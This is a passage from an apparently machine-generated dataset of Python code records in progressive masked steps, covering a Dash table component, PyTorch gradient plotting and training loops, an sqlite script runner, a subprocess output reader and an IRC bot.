"step-5": "import dash_table\nimport pandas as pd\nimport dash_html_components as html\nimport dash_core_components as dcc\nfrom dash.dependencies import Input, Output\nfrom dash_oop_components import DashComponent\nimport dash_table\nimport dash_bootstrap_components as dbc\nfrom dash.dependencies import Input, Output, State\nfrom dash_oop_components import DashFigureFactory, DashComponent, DashComponentTabs, DashApp\n\n\nfrom src.main.python.oop.Dataframe import Dataframe\nfrom src.main.python.oop.Figure_factories import VisualFactories\n\nclass Table(DashComponent):\n def __init__(self, plot_factory, df, title=\"Table\"):\n \"\"\"\n Displays table at the bottom of the page.\n :param plot_factory: Factory with all plot functions\n :param df: Dataframe with all data\n :param title: Title of the page\n \"\"\"\n super().__init__(title=title)\n self.plot_factory = plot_factory\n self.df = df\n\n def layout(self, params=None):\n \"\"\"\n Shows the html layout of the table component.\n :param params: Parameters selected at the current level of the dashboard.\n :return: Html layout of the program.\n \"\"\"\n return html.Div([\n dcc.Loading(\n id=\"loading-icon3\",\n children=[html.Div(id='output-data-upload')],\n type=\"dot\",\n )\n ])\n\n def component_callbacks(self, app):\n \"\"\"\n Automatically does the callbacks of the interactive parts of the table component.\n :param app: Dash app that uses the code.\n :return: Output of the callback functions.\n \"\"\"\n @app.callback(\n Output('main_table', 'selected_rows' + self.title),\n Input('Mygraph-normal-plot', 'selectedData'))\n def display_selected_data(graphPoints):\n \"\"\"\n Display the selected data i the table.\n :param graphPoints: Data that is currently displayed\n :return: Table\n \"\"\"\n points_selected = []\n if graphPoints is not None:\n print(graphPoints)\n for point in graphPoints['points']:\n points_selected.append(point['customdata'][0])\n return points_selected\n\n def set_data(self, df):\n \"\"\"\n Loads in possible parameters for the x and y-axis in dropdown from the data.\n :param dummy: dummy html property\n :return: Possible options for dropdown x-axis.\n \"\"\"\n self.df = df",
"step-ids": [
1,
3,
5,
6,
7
]
}
|
[
1,
3,
5,
6,
7
] |
import torch
import torch.nn.functional as f
import time
import matplotlib.pyplot as plt
from matplotlib.lines import Line2D
import numpy as np
dtype = torch.float
device = torch.device("cpu")
# device = torch.device("cuda:0") # Uncomment this to run on GPU
N, D_in, H, D_out = 64, 1000, 100, 10
x = torch.randn(N, D_in, device=device, dtype=dtype)
y = torch.randn(N, D_out, device=device, dtype=dtype)
model = torch.nn.Sequential(
torch.nn.Linear(D_in, H),
torch.nn.ReLU(),
torch.nn.Linear(H, D_out),
)
def plot_grad_flow(named_parameters):
'''Plots the gradients flowing through different layers in the net during training.
Can be used for checking for possible gradient vanishing / exploding problems.
Usage: Plug this function in Trainer class after loss.backwards() as
"plot_grad_flow(self.model.named_parameters())" to visualize the gradient flow'''
ave_grads = []
max_grads = []
layers = []
for n, p in named_parameters:
if (p.requires_grad) and ("bias" not in n):
layers.append(n)
ave_grads.append(p.grad.abs().mean())
max_grads.append(p.grad.abs().max())
plt.bar(np.arange(len(max_grads)), max_grads, alpha=0.1, lw=1, color="c")
plt.bar(np.arange(len(max_grads)), ave_grads, alpha=0.1, lw=1, color="b")
plt.hlines(0, 0, len(ave_grads) + 1, lw=2, color="k")
plt.xticks(range(0, len(ave_grads), 1), layers, rotation="vertical")
plt.xlim(left=0, right=len(ave_grads))
plt.ylim(bottom=-0.001, top=0.02) # zoom in on the lower gradient regions
plt.xlabel("Layers")
plt.ylabel("average gradient")
plt.title("Gradient flow")
plt.grid(True)
plt.legend([Line2D([0], [0], color="c", lw=4),
Line2D([0], [0], color="b", lw=4),
Line2D([0], [0], color="k", lw=4)], ['max-gradient', 'mean-gradient', 'zero-gradient'])
plt.show()
learning_rate = 1e-6
y_pred = model(x)
loss = (y_pred - y).pow(2).sum()
loss.backward()
plot_grad_flow(model.named_parameters())
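# Editor's note: `learning_rate` above is defined but never used in this
# snippet; a manual SGD update that would consume it might look like this
# (editor's illustration, not part of the original code):
with torch.no_grad():
    for param in model.parameters():
        param -= learning_rate * param.grad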
|
normal
|
{
"blob_id": "0fb424dafaac184882ea56f36265e0b19b5a4c50",
"index": 9758,
"step-1": "<mask token>\n\n\ndef plot_grad_flow(named_parameters):\n \"\"\"Plots the gradients flowing through different layers in the net during training.\n Can be used for checking for possible gradient vanishing / exploding problems.\n\n Usage: Plug this function in Trainer class after loss.backwards() as\n \"plot_grad_flow(self.model.named_parameters())\" to visualize the gradient flow\"\"\"\n ave_grads = []\n max_grads = []\n layers = []\n for n, p in named_parameters:\n if p.requires_grad and 'bias' not in n:\n layers.append(n)\n ave_grads.append(p.grad.abs().mean())\n max_grads.append(p.grad.abs().max())\n plt.bar(np.arange(len(max_grads)), max_grads, alpha=0.1, lw=1, color='c')\n plt.bar(np.arange(len(max_grads)), ave_grads, alpha=0.1, lw=1, color='b')\n plt.hlines(0, 0, len(ave_grads) + 1, lw=2, color='k')\n plt.xticks(range(0, len(ave_grads), 1), layers, rotation='vertical')\n plt.xlim(left=0, right=len(ave_grads))\n plt.ylim(bottom=-0.001, top=0.02)\n plt.xlabel('Layers')\n plt.ylabel('average gradient')\n plt.title('Gradient flow')\n plt.grid(True)\n plt.legend([Line2D([0], [0], color='c', lw=4), Line2D([0], [0], color=\n 'b', lw=4), Line2D([0], [0], color='k', lw=4)], ['max-gradient',\n 'mean-gradient', 'zero-gradient'])\n plt.show()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef plot_grad_flow(named_parameters):\n \"\"\"Plots the gradients flowing through different layers in the net during training.\n Can be used for checking for possible gradient vanishing / exploding problems.\n\n Usage: Plug this function in Trainer class after loss.backwards() as\n \"plot_grad_flow(self.model.named_parameters())\" to visualize the gradient flow\"\"\"\n ave_grads = []\n max_grads = []\n layers = []\n for n, p in named_parameters:\n if p.requires_grad and 'bias' not in n:\n layers.append(n)\n ave_grads.append(p.grad.abs().mean())\n max_grads.append(p.grad.abs().max())\n plt.bar(np.arange(len(max_grads)), max_grads, alpha=0.1, lw=1, color='c')\n plt.bar(np.arange(len(max_grads)), ave_grads, alpha=0.1, lw=1, color='b')\n plt.hlines(0, 0, len(ave_grads) + 1, lw=2, color='k')\n plt.xticks(range(0, len(ave_grads), 1), layers, rotation='vertical')\n plt.xlim(left=0, right=len(ave_grads))\n plt.ylim(bottom=-0.001, top=0.02)\n plt.xlabel('Layers')\n plt.ylabel('average gradient')\n plt.title('Gradient flow')\n plt.grid(True)\n plt.legend([Line2D([0], [0], color='c', lw=4), Line2D([0], [0], color=\n 'b', lw=4), Line2D([0], [0], color='k', lw=4)], ['max-gradient',\n 'mean-gradient', 'zero-gradient'])\n plt.show()\n\n\n<mask token>\nloss.backward()\nplot_grad_flow(model.named_parameters())\n",
"step-3": "<mask token>\ndtype = torch.float\ndevice = torch.device('cpu')\nN, D_in, H, D_out = 64, 1000, 100, 10\nx = torch.randn(N, D_in, device=device, dtype=dtype)\ny = torch.randn(N, D_out, device=device, dtype=dtype)\nmodel = torch.nn.Sequential(torch.nn.Linear(D_in, H), torch.nn.ReLU(),\n torch.nn.Linear(H, D_out))\n\n\ndef plot_grad_flow(named_parameters):\n \"\"\"Plots the gradients flowing through different layers in the net during training.\n Can be used for checking for possible gradient vanishing / exploding problems.\n\n Usage: Plug this function in Trainer class after loss.backwards() as\n \"plot_grad_flow(self.model.named_parameters())\" to visualize the gradient flow\"\"\"\n ave_grads = []\n max_grads = []\n layers = []\n for n, p in named_parameters:\n if p.requires_grad and 'bias' not in n:\n layers.append(n)\n ave_grads.append(p.grad.abs().mean())\n max_grads.append(p.grad.abs().max())\n plt.bar(np.arange(len(max_grads)), max_grads, alpha=0.1, lw=1, color='c')\n plt.bar(np.arange(len(max_grads)), ave_grads, alpha=0.1, lw=1, color='b')\n plt.hlines(0, 0, len(ave_grads) + 1, lw=2, color='k')\n plt.xticks(range(0, len(ave_grads), 1), layers, rotation='vertical')\n plt.xlim(left=0, right=len(ave_grads))\n plt.ylim(bottom=-0.001, top=0.02)\n plt.xlabel('Layers')\n plt.ylabel('average gradient')\n plt.title('Gradient flow')\n plt.grid(True)\n plt.legend([Line2D([0], [0], color='c', lw=4), Line2D([0], [0], color=\n 'b', lw=4), Line2D([0], [0], color='k', lw=4)], ['max-gradient',\n 'mean-gradient', 'zero-gradient'])\n plt.show()\n\n\nlearning_rate = 1e-06\ny_pred = model(x)\nloss = (y_pred - y).pow(2).sum()\nloss.backward()\nplot_grad_flow(model.named_parameters())\n",
"step-4": "import torch\nimport torch.nn.functional as f\nimport time\nimport matplotlib.pyplot as plt\nfrom matplotlib.lines import Line2D\nimport numpy as np\ndtype = torch.float\ndevice = torch.device('cpu')\nN, D_in, H, D_out = 64, 1000, 100, 10\nx = torch.randn(N, D_in, device=device, dtype=dtype)\ny = torch.randn(N, D_out, device=device, dtype=dtype)\nmodel = torch.nn.Sequential(torch.nn.Linear(D_in, H), torch.nn.ReLU(),\n torch.nn.Linear(H, D_out))\n\n\ndef plot_grad_flow(named_parameters):\n \"\"\"Plots the gradients flowing through different layers in the net during training.\n Can be used for checking for possible gradient vanishing / exploding problems.\n\n Usage: Plug this function in Trainer class after loss.backwards() as\n \"plot_grad_flow(self.model.named_parameters())\" to visualize the gradient flow\"\"\"\n ave_grads = []\n max_grads = []\n layers = []\n for n, p in named_parameters:\n if p.requires_grad and 'bias' not in n:\n layers.append(n)\n ave_grads.append(p.grad.abs().mean())\n max_grads.append(p.grad.abs().max())\n plt.bar(np.arange(len(max_grads)), max_grads, alpha=0.1, lw=1, color='c')\n plt.bar(np.arange(len(max_grads)), ave_grads, alpha=0.1, lw=1, color='b')\n plt.hlines(0, 0, len(ave_grads) + 1, lw=2, color='k')\n plt.xticks(range(0, len(ave_grads), 1), layers, rotation='vertical')\n plt.xlim(left=0, right=len(ave_grads))\n plt.ylim(bottom=-0.001, top=0.02)\n plt.xlabel('Layers')\n plt.ylabel('average gradient')\n plt.title('Gradient flow')\n plt.grid(True)\n plt.legend([Line2D([0], [0], color='c', lw=4), Line2D([0], [0], color=\n 'b', lw=4), Line2D([0], [0], color='k', lw=4)], ['max-gradient',\n 'mean-gradient', 'zero-gradient'])\n plt.show()\n\n\nlearning_rate = 1e-06\ny_pred = model(x)\nloss = (y_pred - y).pow(2).sum()\nloss.backward()\nplot_grad_flow(model.named_parameters())\n",
"step-5": "\nimport torch\nimport torch.nn.functional as f\nimport time\nimport matplotlib.pyplot as plt\nfrom matplotlib.lines import Line2D\nimport numpy as np\n\ndtype = torch.float\ndevice = torch.device(\"cpu\")\n# device = torch.device(\"cuda:0\") # Uncomment this to run on GPU\n\nN, D_in, H, D_out = 64, 1000, 100, 10\n\nx = torch.randn(N, D_in, device=device, dtype=dtype)\ny = torch.randn(N, D_out, device=device, dtype=dtype)\n\nmodel = torch.nn.Sequential(\n torch.nn.Linear(D_in, H),\n torch.nn.ReLU(),\n torch.nn.Linear(H, D_out),\n)\n\n\ndef plot_grad_flow(named_parameters):\n '''Plots the gradients flowing through different layers in the net during training.\n Can be used for checking for possible gradient vanishing / exploding problems.\n\n Usage: Plug this function in Trainer class after loss.backwards() as\n \"plot_grad_flow(self.model.named_parameters())\" to visualize the gradient flow'''\n ave_grads = []\n max_grads = []\n layers = []\n for n, p in named_parameters:\n if (p.requires_grad) and (\"bias\" not in n):\n layers.append(n)\n ave_grads.append(p.grad.abs().mean())\n max_grads.append(p.grad.abs().max())\n plt.bar(np.arange(len(max_grads)), max_grads, alpha=0.1, lw=1, color=\"c\")\n plt.bar(np.arange(len(max_grads)), ave_grads, alpha=0.1, lw=1, color=\"b\")\n plt.hlines(0, 0, len(ave_grads) + 1, lw=2, color=\"k\")\n plt.xticks(range(0, len(ave_grads), 1), layers, rotation=\"vertical\")\n plt.xlim(left=0, right=len(ave_grads))\n plt.ylim(bottom=-0.001, top=0.02) # zoom in on the lower gradient regions\n plt.xlabel(\"Layers\")\n plt.ylabel(\"average gradient\")\n plt.title(\"Gradient flow\")\n plt.grid(True)\n plt.legend([Line2D([0], [0], color=\"c\", lw=4),\n Line2D([0], [0], color=\"b\", lw=4),\n Line2D([0], [0], color=\"k\", lw=4)], ['max-gradient', 'mean-gradient', 'zero-gradient'])\n\n plt.show()\n\nlearning_rate = 1e-6\ny_pred = model(x)\nloss = (y_pred - y).pow(2).sum()\nloss.backward()\nplot_grad_flow(model.named_parameters())\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def registry_names():
return iter(_registry)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def registry(name):
_registry.append(name)
def registry_names():
return iter(_registry)
<|reserved_special_token_1|>
_registry = []
def registry(name):
_registry.append(name)
def registry_names():
return iter(_registry)
|
flexible
|
{
"blob_id": "51642dbb210600f9ca4e035fb884fbdda030fd04",
"index": 1491,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef registry_names():\n return iter(_registry)\n",
"step-3": "<mask token>\n\n\ndef registry(name):\n _registry.append(name)\n\n\ndef registry_names():\n return iter(_registry)\n",
"step-4": "_registry = []\n\n\ndef registry(name):\n _registry.append(name)\n\n\ndef registry_names():\n return iter(_registry)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import time
from typing import List
from classiclikeiguana.timeout import timeout
class ExecutionMetrics:
def __init__(self, duration, succeeded: bool, timed_out: bool, lines: int, error: List[str] = None):
if error is None:
error = list()
self.duration = duration
self.succeeded: bool = succeeded
self.timed_out: bool = timed_out
self.lines: int = lines
self.error: List[str] = error
def __str__(self):
return "succeeded: {succeeded} ; lines: {lines} ; duration: {duration} s ; error: {error}" \
.format(succeeded=self.succeeded, lines=self.lines, duration=self.duration, error=self.error)
def read_stdout_until(process, terminal_startswith: List[str], failure_startswith: List[str], timeout_time: float,
debug: bool = False):
start = time.time()
line: str = ""
lines: int = 0
duration = None
succeeded = True
timed_out = False
errors: List[str] = list()
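    # read stdout line by line; the timeout context bounds how long we wait for a terminal line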
with timeout(timeout_time):
while True:
line = process.stdout.readline()
if debug: print(line, end="")
for start_str in failure_startswith:
if line.startswith(start_str):
errors.append(line)
succeeded = False
if any(line.startswith(start_str) for start_str in terminal_startswith):
duration = time.time() - start
break
else:
lines += 1
if duration is None:
succeeded = False
timed_out = True
duration = timeout_time
return ExecutionMetrics(duration, succeeded, timed_out, lines, errors)
|
normal
|
{
"blob_id": "f870c776a62f3b743356c5515cd25e588dbfca15",
"index": 8183,
"step-1": "<mask token>\n\n\nclass ExecutionMetrics:\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass ExecutionMetrics:\n\n def __init__(self, duration, succeeded: bool, timed_out: bool, lines:\n int, error: List[str]=None):\n if error is None:\n error = list()\n self.duration = duration\n self.succeeded: bool = succeeded\n self.timed_out: bool = timed_out\n self.lines: int = lines\n self.error: List[str] = error\n\n def __str__(self):\n return (\n 'succeeded: {succeeded} ; lines: {lines} ; duration: {duration} s ; error: {error}'\n .format(succeeded=self.succeeded, lines=self.lines, duration=\n self.duration, error=self.error))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass ExecutionMetrics:\n\n def __init__(self, duration, succeeded: bool, timed_out: bool, lines:\n int, error: List[str]=None):\n if error is None:\n error = list()\n self.duration = duration\n self.succeeded: bool = succeeded\n self.timed_out: bool = timed_out\n self.lines: int = lines\n self.error: List[str] = error\n\n def __str__(self):\n return (\n 'succeeded: {succeeded} ; lines: {lines} ; duration: {duration} s ; error: {error}'\n .format(succeeded=self.succeeded, lines=self.lines, duration=\n self.duration, error=self.error))\n\n\ndef read_stdout_until(process, terminal_startswith: str, failure_startswith:\n List[str], timeout_time: float, debug: bool=False):\n start = time.time()\n line: str = ''\n lines: int = 0\n duration = None\n succeeded = True\n timed_out = False\n errors: List[str] = list()\n with timeout(timeout_time):\n while True:\n line = process.stdout.readline()\n if debug:\n print(line, end='')\n for start_str in failure_startswith:\n if line.startswith(start_str):\n errors.append(line)\n succeeded = False\n if any(line.startswith(start_str) for start_str in\n terminal_startswith):\n duration = time.time() - start\n break\n else:\n lines += 1\n if duration is None:\n succeeded = False\n timed_out = True\n duration = timeout_time\n return ExecutionMetrics(duration, succeeded, timed_out, lines, errors)\n",
"step-4": "import time\nfrom typing import List\nfrom classiclikeiguana.timeout import timeout\n\n\nclass ExecutionMetrics:\n\n def __init__(self, duration, succeeded: bool, timed_out: bool, lines:\n int, error: List[str]=None):\n if error is None:\n error = list()\n self.duration = duration\n self.succeeded: bool = succeeded\n self.timed_out: bool = timed_out\n self.lines: int = lines\n self.error: List[str] = error\n\n def __str__(self):\n return (\n 'succeeded: {succeeded} ; lines: {lines} ; duration: {duration} s ; error: {error}'\n .format(succeeded=self.succeeded, lines=self.lines, duration=\n self.duration, error=self.error))\n\n\ndef read_stdout_until(process, terminal_startswith: str, failure_startswith:\n List[str], timeout_time: float, debug: bool=False):\n start = time.time()\n line: str = ''\n lines: int = 0\n duration = None\n succeeded = True\n timed_out = False\n errors: List[str] = list()\n with timeout(timeout_time):\n while True:\n line = process.stdout.readline()\n if debug:\n print(line, end='')\n for start_str in failure_startswith:\n if line.startswith(start_str):\n errors.append(line)\n succeeded = False\n if any(line.startswith(start_str) for start_str in\n terminal_startswith):\n duration = time.time() - start\n break\n else:\n lines += 1\n if duration is None:\n succeeded = False\n timed_out = True\n duration = timeout_time\n return ExecutionMetrics(duration, succeeded, timed_out, lines, errors)\n",
"step-5": "import time\nfrom typing import List\n\nfrom classiclikeiguana.timeout import timeout\n\n\nclass ExecutionMetrics:\n def __init__(self, duration, succeeded: bool, timed_out: bool, lines: int, error: List[str] = None):\n if error is None:\n error = list()\n self.duration = duration\n self.succeeded: bool = succeeded\n self.timed_out: bool = timed_out\n self.lines: int = lines\n self.error: List[str] = error\n\n def __str__(self):\n return \"succeeded: {succeeded} ; lines: {lines} ; duration: {duration} s ; error: {error}\" \\\n .format(succeeded=self.succeeded, lines=self.lines, duration=self.duration, error=self.error)\n\n\ndef read_stdout_until(process, terminal_startswith: str, failure_startswith: List[str], timeout_time: float,\n debug: bool = False):\n start = time.time()\n line: str = \"\"\n lines: int = 0\n duration = None\n succeeded = True\n timed_out = False\n errors: List[str] = list()\n with timeout(timeout_time):\n while True:\n line = process.stdout.readline()\n if debug: print(line, end=\"\")\n for start_str in failure_startswith:\n if line.startswith(start_str):\n errors.append(line)\n succeeded = False\n if any(line.startswith(start_str) for start_str in terminal_startswith):\n duration = time.time() - start\n break\n else:\n lines += 1\n\n if duration is None:\n succeeded = False\n timed_out = True\n duration = timeout_time\n return ExecutionMetrics(duration, succeeded, timed_out, lines, errors)\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
import sqlite3
connection = sqlite3.connect("../db.sqlite3")
cursor = connection.cursor()
sql_file = open("sample.sql")
sql_as_string = sql_file.read()
cursor.executescript(sql_as_string)
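# executescript runs every statement in sample.sql in a single call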
for row in cursor.execute("SELECT * FROM results_states"):
print(row)
|
normal
|
{
"blob_id": "10a981e35ce00ee8e32a613823d3bc919fafaae8",
"index": 8225,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ncursor.executescript(sql_as_string)\nfor row in cursor.execute('SELECT * FROM results_states'):\n print(row)\n",
"step-3": "<mask token>\nconnection = sqlite3.connect('../db.sqlite3')\ncursor = connection.cursor()\nsql_file = open('sample.sql')\nsql_as_string = sql_file.read()\ncursor.executescript(sql_as_string)\nfor row in cursor.execute('SELECT * FROM results_states'):\n print(row)\n",
"step-4": "import sqlite3\nconnection = sqlite3.connect('../db.sqlite3')\ncursor = connection.cursor()\nsql_file = open('sample.sql')\nsql_as_string = sql_file.read()\ncursor.executescript(sql_as_string)\nfor row in cursor.execute('SELECT * FROM results_states'):\n print(row)\n",
"step-5": "import sqlite3\n\nconnection = sqlite3.connect(\"../db.sqlite3\")\n\ncursor = connection.cursor()\n\nsql_file = open(\"sample.sql\")\nsql_as_string = sql_file.read()\ncursor.executescript(sql_as_string)\n\nfor row in cursor.execute(\"SELECT * FROM results_states\"):\n print(row)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import datetime
import logging
import random
import transform
import timelapse
# merge two iterators producing sorted values
def merge(s1, s2):
try:
x1 = next(s1)
except StopIteration:
yield from s2
return
try:
x2 = next(s2)
except StopIteration:
yield from s1
return
while True:
if x2 > x1:
yield x1
try:
x1 = next(s1)
except StopIteration:
yield x2
yield from s2
return
else:
yield x2
try:
x2 = next(s2)
except StopIteration:
yield x1
yield from s1
return
def sliding_stream(delay_secs=20):
ts = datetime.datetime.now()
delay = datetime.timedelta(0,delay_secs)
while True:
yield(ts, random.choice(transform.all_transforms))
ts = ts + delay
class Sliders(timelapse.TimeLapse):
def __init__(self, server_list, nick="Sliders", channel="#sliders", realname="Sliders",
sliding_window = 60, **params):
super().__init__(server_list, nick=nick, channel=channel, **params)
self.lapsed = merge(self.lapsed, sliding_stream(sliding_window))
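        # interleave periodic transform events with the time-lapsed messages, keeping timestamp order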
self.sliders_transform = random.choice(transform.all_transforms)
def on_lapsed_message(self, msg):
if isinstance(msg, transform.Transform):
self.sliders_transform = msg
self.connection.privmsg(self.lapsed_channel,
"\x01ACTION s'ouvre vers un monde parallèle peuplé de jumeaux "
+ msg.name + "\x01")
else:
super().on_lapsed_message(self.sliders_transform(msg))
|
normal
|
{
"blob_id": "c651d49c98a4cf457c8252c94c6785dea8e9af60",
"index": 3909,
"step-1": "<mask token>\n\n\nclass Sliders(timelapse.TimeLapse):\n\n def __init__(self, server_list, nick='Sliders', channel='#sliders',\n realname='Sliders', sliding_window=60, **params):\n super().__init__(server_list, nick=nick, channel=channel, **params)\n self.lapsed = merge(self.lapsed, sliding_stream(sliding_window))\n self.sliders_transform = random.choice(transform.all_transforms)\n\n def on_lapsed_message(self, msg):\n if isinstance(msg, transform.Transform):\n self.sliders_transform = msg\n self.connection.privmsg(self.lapsed_channel, \n \"\\x01ACTION s'ouvre vers un monde parallèle peuplé de jumeaux \"\n + msg.name + '\\x01')\n else:\n super().on_lapsed_message(self.sliders_transform(msg))\n",
"step-2": "<mask token>\n\n\ndef sliding_stream(delay_secs=20):\n ts = datetime.datetime.now()\n delay = datetime.timedelta(0, delay_secs)\n while True:\n yield ts, random.choice(transform.all_transforms)\n ts = ts + delay\n\n\nclass Sliders(timelapse.TimeLapse):\n\n def __init__(self, server_list, nick='Sliders', channel='#sliders',\n realname='Sliders', sliding_window=60, **params):\n super().__init__(server_list, nick=nick, channel=channel, **params)\n self.lapsed = merge(self.lapsed, sliding_stream(sliding_window))\n self.sliders_transform = random.choice(transform.all_transforms)\n\n def on_lapsed_message(self, msg):\n if isinstance(msg, transform.Transform):\n self.sliders_transform = msg\n self.connection.privmsg(self.lapsed_channel, \n \"\\x01ACTION s'ouvre vers un monde parallèle peuplé de jumeaux \"\n + msg.name + '\\x01')\n else:\n super().on_lapsed_message(self.sliders_transform(msg))\n",
"step-3": "<mask token>\n\n\ndef merge(s1, s2):\n try:\n x1 = next(s1)\n except StopIteration:\n yield from s2\n return\n try:\n x2 = next(s2)\n except StopIteration:\n yield from s1\n return\n while True:\n if x2 > x1:\n yield x1\n try:\n x1 = next(s1)\n except StopIteration:\n yield x2\n yield from s2\n return\n else:\n yield x2\n try:\n x2 = next(s2)\n except StopIteration:\n yield x1\n yield from s1\n return\n\n\ndef sliding_stream(delay_secs=20):\n ts = datetime.datetime.now()\n delay = datetime.timedelta(0, delay_secs)\n while True:\n yield ts, random.choice(transform.all_transforms)\n ts = ts + delay\n\n\nclass Sliders(timelapse.TimeLapse):\n\n def __init__(self, server_list, nick='Sliders', channel='#sliders',\n realname='Sliders', sliding_window=60, **params):\n super().__init__(server_list, nick=nick, channel=channel, **params)\n self.lapsed = merge(self.lapsed, sliding_stream(sliding_window))\n self.sliders_transform = random.choice(transform.all_transforms)\n\n def on_lapsed_message(self, msg):\n if isinstance(msg, transform.Transform):\n self.sliders_transform = msg\n self.connection.privmsg(self.lapsed_channel, \n \"\\x01ACTION s'ouvre vers un monde parallèle peuplé de jumeaux \"\n + msg.name + '\\x01')\n else:\n super().on_lapsed_message(self.sliders_transform(msg))\n",
"step-4": "import datetime\nimport logging\nimport random\nimport transform\nimport timelapse\n\n\ndef merge(s1, s2):\n try:\n x1 = next(s1)\n except StopIteration:\n yield from s2\n return\n try:\n x2 = next(s2)\n except StopIteration:\n yield from s1\n return\n while True:\n if x2 > x1:\n yield x1\n try:\n x1 = next(s1)\n except StopIteration:\n yield x2\n yield from s2\n return\n else:\n yield x2\n try:\n x2 = next(s2)\n except StopIteration:\n yield x1\n yield from s1\n return\n\n\ndef sliding_stream(delay_secs=20):\n ts = datetime.datetime.now()\n delay = datetime.timedelta(0, delay_secs)\n while True:\n yield ts, random.choice(transform.all_transforms)\n ts = ts + delay\n\n\nclass Sliders(timelapse.TimeLapse):\n\n def __init__(self, server_list, nick='Sliders', channel='#sliders',\n realname='Sliders', sliding_window=60, **params):\n super().__init__(server_list, nick=nick, channel=channel, **params)\n self.lapsed = merge(self.lapsed, sliding_stream(sliding_window))\n self.sliders_transform = random.choice(transform.all_transforms)\n\n def on_lapsed_message(self, msg):\n if isinstance(msg, transform.Transform):\n self.sliders_transform = msg\n self.connection.privmsg(self.lapsed_channel, \n \"\\x01ACTION s'ouvre vers un monde parallèle peuplé de jumeaux \"\n + msg.name + '\\x01')\n else:\n super().on_lapsed_message(self.sliders_transform(msg))\n",
"step-5": "import datetime\nimport logging\nimport random\nimport transform\nimport timelapse\n\n# merge two iterators producing sorted values\ndef merge(s1, s2):\n try:\n x1 = next(s1)\n except StopIteration:\n yield from s2\n return\n\n try:\n x2 = next(s2)\n except StopIteration:\n yield from s1\n return\n\n while True:\n if x2 > x1:\n yield x1\n try:\n x1 = next(s1)\n except StopIteration:\n yield x2\n yield from s2\n return\n else:\n yield x2\n try:\n x2 = next(s2)\n except StopIteration:\n yield x1\n yield from s1\n return\n \n\ndef sliding_stream(delay_secs=20):\n ts = datetime.datetime.now()\n delay = datetime.timedelta(0,delay_secs)\n while True:\n yield(ts, random.choice(transform.all_transforms))\n ts = ts + delay\n\nclass Sliders(timelapse.TimeLapse):\n def __init__(self, server_list, nick=\"Sliders\", channel=\"#sliders\", realname=\"Sliders\",\n sliding_window = 60, **params):\n super().__init__(server_list, nick=nick, channel=channel, **params)\n self.lapsed = merge(self.lapsed, sliding_stream(sliding_window))\n self.sliders_transform = random.choice(transform.all_transforms)\n\n def on_lapsed_message(self, msg):\n\n if isinstance(msg, transform.Transform):\n self.sliders_transform = msg\n self.connection.privmsg(self.lapsed_channel,\n \"\\x01ACTION s'ouvre vers un monde parallèle peuplé de jumeaux \"\n + msg.name + \"\\x01\")\n else:\n super().on_lapsed_message(self.sliders_transform(msg))\n\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
model.to(device)
<|reserved_special_token_0|>
...
for epoch in range(epochs):
running_loss = 0
running_acc = 0
train_loss = 0
model.train()
for image, label in tqdm(train_dataloader, desc='Epoch [%d/%d]' % (
epoch + 1, epochs)):
optimizer.zero_grad()
image = image / 255.0
pred = model(image.float().transpose(3, 2).transpose(2, 1).to(device))
loss = criterion(pred, label.to(device))
loss.backward()
optimizer.step()
Softmax = torch.nn.Softmax(dim=1)
_, prediction_tr = torch.max(Softmax(pred), 1)
y_true_tr = label.cpu().detach().numpy()
y_pred_tr = prediction_tr.cpu().detach().numpy()
acc_tr = (label == prediction_tr.cpu()).sum().item() / pred.shape[0
] * 100
running_loss += loss * image.size(0)
running_acc += acc_tr * image.size(0)
train_loss = running_loss / len(train_dataset)
train_acc = running_acc / len(train_dataset)
print('>>> Train loss : %.4f - Train acc : %.4f' % (train_loss, train_acc))
running_loss = 0
running_acc = 0
model.eval()
with torch.no_grad():
for image, label in valid_dataloader:
image = image / 255.0
pred = model(image.float().transpose(3, 2).transpose(1, 2).to(
device))
loss = criterion(pred, label.to(device))
Softmax = torch.nn.Softmax(dim=1)
_, prediction = torch.max(Softmax(pred), 1)
y_true = label.cpu().detach().numpy()
y_pred = prediction.cpu().detach().numpy()
acc_tr = (label == prediction.cpu()).sum().item() / pred.shape[0
] * 100
running_loss += loss.item() * image.size(0)
running_acc += acc_tr * image.size(0)
valid_loss = running_loss / len(valid_dataset)
valid_acc = running_acc / len(valid_dataset)
print('>>> Valid loss : %.4f - Valid acc : %.4f\n' % (valid_loss,
valid_acc))
print(prediction)
print(label)
print()
if (epoch + 1) % 5 == 0:
save_path = os.path.join('.', 'save_')
if not os.path.exists(save_path):
os.makedirs(save_path)
torch.save(model, os.path.join(save_path,
'model_epoch%04d_loss_%.4f_acc_%.4f.ckpt' % (epoch, valid_loss,
valid_acc)))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
lr = 1e-05
epochs = 500
batch_size = 2
train_data_path = '../../../data/face_data'
train_dataset = FER(train_data_path, image_size=64, mode='train')
train_dataloader = DataLoader(train_dataset, batch_size=batch_size, shuffle
=True)
valid_data_path = '../../../data/face_data'
valid_dataset = FER(valid_data_path, image_size=64, mode='val')
valid_dataloader = DataLoader(valid_dataset, batch_size=batch_size, shuffle
=False)
model = md.vgg16_bn(num_classes=3).to(device)
model.to(device)
criterion = torch.nn.CrossEntropyLoss().to(device)
optimizer = torch.optim.Adam(params=model.parameters(), lr=lr)
...
for epoch in range(epochs):
running_loss = 0
running_acc = 0
train_loss = 0
model.train()
for image, label in tqdm(train_dataloader, desc='Epoch [%d/%d]' % (
epoch + 1, epochs)):
optimizer.zero_grad()
image = image / 255.0
